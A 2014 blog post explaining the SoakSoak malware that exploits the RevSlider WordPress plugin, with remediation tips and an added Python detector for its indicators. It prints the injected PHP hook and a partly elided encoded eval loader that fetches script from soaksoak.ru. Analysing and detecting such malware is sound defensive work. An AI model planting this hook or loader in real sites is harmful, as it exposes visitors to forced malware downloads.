What's Up with Google Blocking 1 Million WordPress Sites?


Google is de-indexing and blocking sites that have the RevSlider plugin enabled. By exploiting a security loophole in the premium WordPress plugin RevSlider, SoakSoak modifies a file in a site's WordPress installation and loads JavaScript malware.

RevSlider is often used in WordPress themes, and sometimes it comes pre-loaded in a theme, so site owners are not even notified about the vulnerability on their site. Moreover, it's not a plugin that's easily updated, as Sucuri's Daniel Cid commented:

“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owners. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes.”

Visitors of infected sites may be redirected to a webpage that will attempt to download malware onto their computers. Google’s decision to block infected sites shortly after the vulnerability became known will hopefully prevent the malware from spreading any further.

Anatomy Behind SoakSoak Malware:

The malware modifies the file wp-includes/template-loader.php and adds the following code snippet:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

The snippet above causes the JavaScript file at wp-includes/js/swfobject.js to be loaded on every page viewed on the site. That file contains the malware:

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

When decoded, this code loads JavaScript malware from the soaksoak.ru domain, specifically the file http://soaksoak.ru/xteas/code, which then leads visitors to download certain files forcibly.
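A local check for the two modifications described above, as an added example that is not from the original article or from Sucuri: it looks for the swfobject enqueue in template-loader.php and percent-decodes any eval(decodeURIComponent(...)) string in swfobject.js without executing it. The function names, the constructed sample strings, and the assumption that a clean template-loader.php never enqueues swfobject belong to this example only.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# Indicators taken from the article; assumption: a clean template-loader.php
# contains no wp_enqueue_script("swfobject") call.
HOOK_RE = re.compile(r"""wp_enqueue_script\(\s*["']swfobject["']\s*\)""")
EVAL_RE = re.compile(r"""eval\(\s*decodeURIComponent\s*\(\s*["']([^"']+)["']""")
BAD_DOMAIN = "soaksoak.ru"

# Constructed samples (not captured malware): the encoded text is a JS comment.
SAMPLE_PHP = 'function FuncQueueObject()\n{\n  wp_enqueue_script("swfobject");\n}\n'
_ENC = "".join(f"%{b:02X}" for b in b"/* constructed: soaksoak.ru */")
SAMPLE_JS = f'eval(decodeURIComponent ("{_ENC}"));'


def loader_is_tampered(php_source):
    """True if the PHP source enqueues swfobject, as the injected snippet does."""
    return bool(HOOK_RE.search(php_source))


def decode_eval_payloads(js_source):
    """Percent-decode every eval(decodeURIComponent("...")) string. Nothing is run."""
    return [unquote(m.group(1)) for m in EVAL_RE.finditer(js_source)]


def scan_wordpress(root):
    """Return findings for the two files the article names under a WordPress root."""
    inc = Path(root) / "wp-includes"
    loader, swf = inc / "template-loader.php", inc / "js" / "swfobject.js"
    findings = []
    if loader.is_file() and loader_is_tampered(loader.read_text(errors="replace")):
        findings.append(f"{loader}: enqueues swfobject")
    if swf.is_file():
        for payload in decode_eval_payloads(swf.read_text(errors="replace")):
            hit = BAD_DOMAIN in payload.lower()
            findings.append(f"{swf}: " + ("references " + BAD_DOMAIN if hit
                                          else "encoded eval payload"))
    return findings


if __name__ == "__main__":
    # Usage: python soaksoak_check.py /path/to/wordpress
    results = scan_wordpress(sys.argv[1] if len(sys.argv) > 1 else ".")
    print("\n".join(results) or "no SoakSoak indicators found")
```

A clean result only means these two indicators are absent; it does not show that the RevSlider plugin itself is patched.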

If you are curious about your site, you can check whether it has been infected by the SoakSoak malware with Sucuri's Free SiteCheck scanner; its signatures have all been updated to detect the latest redirection.

Solutions:

No solution has yet been found for older versions of the RevSlider plugin, but you can keep the plugin updated to the latest version to avoid the security loophole.

If your site has already been infected by this malware, first update the plugin, or better, remove it. There is also a list of resources in this WordPress Support thread that can help you correct the problem.


Posted on 21 December, 2014

Growth Hacker

SEO Consultant , UI/UX Expert & WordPress Pro
